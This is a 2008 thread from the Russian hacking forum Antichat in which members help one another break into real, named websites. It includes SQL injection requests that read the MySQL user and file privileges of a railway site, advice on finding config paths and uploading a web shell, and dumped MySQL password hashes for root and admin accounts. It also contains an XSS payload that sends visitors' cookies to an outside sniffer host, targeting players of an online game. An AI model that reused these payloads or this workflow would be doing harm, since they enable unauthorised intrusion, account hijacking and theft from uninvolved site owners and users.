ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
26.04.2008, 13:12
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
У тебя рутовый пользователь
Код:
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(user()+using+cp1251)+from+mysql.user/* HTTP/1.0
и есть file_priv=Y, значит можешь читать\писать файлы
Код:
POST /ru/index.php?index=4&number=1'+union+select+1,2,3,convert(file_priv+using+cp1251)+from+mysql.user+where+user='root'/* HTTP/1.0
Причем маджик_квотс_гпс отключены.
Твои действия: ищешь httpd.config там ищешь пути до virtualhosts, где в document_root будет лежать полный путь, далее с заливкой шелла по обстоятельствам: можно либо почитать исходники авторизации админки или какие нибудь конфиги, либо влить прямым запросом - пути и способ залить шелл через запрос можно найти здесь на форуме
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 26.04.2008 в 13:15..
|
|
|
26.04.2008, 14:27
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
немного поправлю, точное название httpd.conf или vhosts.conf
кстати наличие magic quotes становится для меня во многих случаях не актуально
https://forum.antichat.ru/showpost.php?p=663815&postcount=39
__________________
Карфаген должен быть разрушен...
|
|
|
|
26.04.2008, 18:06
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
www.railway.dn.ua/ru/index.php?index=4&number=1'+union+select+1,2,3,4/* Знаю что надо найти *.conf чтоб увидеть полный путь.... Помогите....не получается...
|
|
|
|
26.04.2008, 20:57
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Такая трабла - недавно нашел скулю на крупном сайте, начал селектить юзеров из таблицы, но вместо пассов - шифр, явно base64, но расшифровка этого шифра вернула совсем непохожую на пасс строку, думал что хеш, вроде MD5(Base64) но количество символов у разных юзеров меняется, никто не знает, что это за хеш или шифр ?
Examples: VzsGbVZoDDBValUkCCYNdw==
BWcHdAEjVChRMQQz
UWJXZwBnV25XOwUzCmM=
p.s.
Ershik
Хм, вообще то еще Constantine указал на траблу с кодировкой -
convert(file_priv+using+cp1251)
Хэши - MySQL v5.x
rusanov
*2632CF75CFB8987B429348FA90905C86DF24D0A7
root
*97757F6F08362A7CBA6F30E72EB90A73C79168EE
admin
*3D07E0D0A6AB1EB78DA1D222570ED89455FB7045
dummy
*9C47AFA62907DE2D94072B9820EFCA74185D5111
|
|
|
|
27.04.2008, 02:18
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
На100ящий
дефолтные пути к конфигам тут:
https://forum.antichat.ru/thread49775.html
пишешь скриптик или руками через file_priv, далее по накатанной как я написал
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
27.04.2008, 11:49
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??
|
|
|
|
27.04.2008, 12:04
|
|
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307
Репутация:
114
|
|
Сообщение от satana8920
я конечно прошу прощения за столь ламерский вопрос но как повесить фрейм на страницу с помощью скуль иньекции??
если есть file_priv, залить шелл и повесить фрейм 
по другому никак...
|
|
|
|
27.04.2008, 14:08
|
|
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223
Репутация:
5
|
|
Constantine, уже перепробовал все пути вручную и ничего не подходит, как ещё можно найти путь???
|
|
|
|
27.04.2008, 20:38
|
|
Участник форума
Регистрация: 27.11.2007
Сообщений: 282
Провел на форуме:
1435337
Репутация:
109
|
|
Подскажите какую ни будь статью о добавлении новых сплоитов к связке сплоитов...
|
|
|
|
27.04.2008, 21:03
|
|
Banned
Регистрация: 27.04.2008
Сообщений: 683
Провел на форуме:
3248203
Репутация:
628
|
|
Сразу к делу.
Проблема с XSS ...
Вот она:
Когда я ввожу XSS ...
а ввожу я его в игру travian.ru он меня перемещат на мой сниффер, но я не знаю , как дать ссылку людям((
примерно вот:
Сначала ввожу: ">
потом no"><script> document.location.href="http://s.netsec.ru/60880.gif?"+encodeURI(document.cookie); </script><
т.е. там speed.travian.ru/allianz.php и всё..а надо чтоб альянс переминовался по "какой нибудь" ссылке... оч прошу - помогите(((
Но там пхп ...я в общем то хз ... попробуйте вот тут:
speed.travian.ru < зарегистрируйтесь , постройте посольство до 3 ЛВЛа... - создайте альянс \и переминуйте его в поле "ally2" ((
Если можно то ответы в 452277469 ! но сюда тоже зайду!
Заранее спасибо! 
===т.е. мне надо СРАЗУ ссылку сделать , чтобы она переминовала альянс и выходила на линк
Подробно обьясню в 452277469 ! TU |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [aywo]](/avatars/avatar32504.jpg?667556){kind=avatar}
Похожие темы
Комбинированный вид
